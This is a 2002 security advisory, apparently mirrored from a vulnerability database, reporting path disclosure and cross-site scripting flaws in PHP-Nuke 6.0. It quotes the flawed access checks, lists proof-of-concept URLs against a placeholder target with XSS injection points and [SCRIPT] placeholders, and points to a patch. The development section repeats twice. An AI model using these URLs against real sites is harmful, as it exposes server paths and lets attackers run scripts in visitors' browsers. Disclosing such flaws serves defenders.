PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

2002-12-1700:00:00

vulners.com

114

JSON

Informations :
°°°°°°°°°°°°°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :

Path Disclosure
XSS

Developpement :
°°°°°°°°°°°°°°°
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds of safety.
The first one (e.g. in modules/Downloads/index.php) is :

if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly…");
}

The second one (e.g. footer.php ) :

if (eregi("footer.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}

Some files haven't these safety measures but they have security holes.

Exploits :
°°°°°°°°°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :

http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or
http://[target]/modules/Forums/bb_smilies.php?site_font=}–></style>[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver
/modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver
/modules/Forums/editpost.php, /modules/Forums/newtopic.php,
/modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php with :
$name
/modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org .

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n

MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp

JSON

PHP-Nuke 6.0 : Path Disclosure &amp; Cross Site Scripting

Developpement : °°°°°°°°°°°°°°° The majority of the PHPNuke's files are includes in modules.php or index.php. To prevent the direct access, PHPNuke made two kinds of safety. The first one (e.g. in modules/Downloads/index.php) is :

if (!eregi("modules.php", $PHP_SELF)) { die ("You can't access this file directly…"); }

The second one (e.g. footer.php ) :

if (eregi("footer.php",$PHP_SELF)) { Header("Location: index.php"); die(); }

PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

Developpement :
°°°°°°°°°°°°°°°
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds of safety.
The first one (e.g. in modules/Downloads/index.php) is :

if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly…");
}

if (eregi("footer.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}